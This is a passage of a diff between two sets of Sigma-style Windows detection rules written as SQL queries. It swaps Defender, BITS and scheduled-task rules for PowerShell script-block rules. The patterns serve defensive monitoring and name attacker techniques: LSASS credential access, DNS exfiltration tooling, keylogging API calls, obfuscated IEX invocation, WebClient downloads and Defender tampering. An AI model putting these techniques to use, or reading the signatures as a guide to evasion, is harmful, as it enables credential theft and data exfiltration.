"a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + 
"attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' 
AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_exclusions.yml" + "filename": 
"posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a 
file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. 
An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": 
"Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation 
framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName 
LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE 
'%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Legitimate usage of the capabilities by administartors or users. 
Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName 
LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim 
Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Download with BITS to Suspicious 
